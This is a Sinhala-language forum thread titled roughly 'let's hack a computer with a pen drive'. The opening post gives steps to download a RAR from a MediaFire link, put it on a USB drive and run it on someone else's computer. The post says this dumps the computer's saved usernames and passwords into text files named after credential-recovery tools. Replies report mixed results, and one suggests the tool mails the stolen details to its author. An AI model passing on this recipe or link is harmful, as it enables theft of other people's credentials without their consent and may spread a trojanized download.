penඑකෙන්computerඑකhackකරමු

EHDEHD

Well-known member
  • Nov 3, 2007
    10,571
    2,958
    113
    බළපිටිය
    penඑකෙන්computerඑකhackකරමු

    pen එකෙන් computer එකක් hack කරමු

    ටිකක් වටිනවා කියල හිතෙන දෙයක් මම අද ඔයාලට කියල දෙනවා . අනික මෙක ගොඩාක් ලෙසි වෙඩක්

    1. මම දෙන link එකට ගිහින් Rar file එක බාගන්න.



    2. ඔබ ලග ඈති පෙන් එක format කර එය තුලට Rar file eka Extract කරගන්න .



    3. ඔබට තොරතුරු ගෑනිමට අවශ්ය com එකට ගහලා run කරන්න එවිට එහි save අති password & username සියල්ල pen එක තුල ගබඩා වෙනු ඈත .



    4. එක තුලට ගොස් එහි අති ( iepv . mailpv . mspass . passwordfox . pspv ) යන TXT files වල දත්ත සියල්ල ගබඩ වෙනු ඈත.



    http://download448.mediafire.com/ldsiukocdi9g/wrdylv4fg4z7yuc/hackspc.com.rar
     

    Samantha567

    Member
    Sep 22, 2009
    20,513
    1,590
    0
    iN fRoNt oF tHe mOnItOr
    මචන්, කොල්ලෝ වැඩ මචන්... ඒත් අපි අදාල කම්පියුටරේට ගහලා පෙන් එක ඕපන් කරන්න ඕනෙද ?
     

    Samantha567

    Member
    Sep 22, 2009
    20,513
    1,590
    0
    iN fRoNt oF tHe mOnItOr
    දැන් මචන් මේකෙ මගේ කම්පියුටරේ තියෙන ඔක්කොම ඇවිල්ලා තියෙනවා, වෙන එකකට ගැහුවත් ඒ ටිකමයි පෙන්නන්නේ
     

    Djwathila

    Well-known member
  • Jul 15, 2010
    8,750
    1,093
    113
    www.wathilacreation.blogspot.com
    දැන් මචන් මේකෙ මගේ කම්පියුටරේ තියෙන ඔක්කොම ඇවිල්ලා තියෙනවා, වෙන එකකට ගැහුවත් ඒ ටිකමයි පෙන්නන්නේ
    කෝකෙ ගැහුවත් ඔය ටිකම තමා බං..................
    කෝකත් එකයි
    ;);)
     

    RLR

    Member
    Aug 30, 2008
    3,200
    401
    0
    Sri Lanka
    දැන් මචන් මේකෙ මගේ කම්පියුටරේ තියෙන ඔක්කොම ඇවිල්ලා තියෙනවා, වෙන එකකට ගැහුවත් ඒ ටිකමයි පෙන්නන්නේ

    wena ekakata gehuwath thiyana tikamai ban pennanne?????

    එහෙනම් ඉතින් දැන් ඔය ඩීටේල්ස් ටික දෙයියනේ කියලා සොෆ්ට් එක හදපු එකාගෙ මේල් එකට ගිහිල්ලා ඇති....:nerd:

    .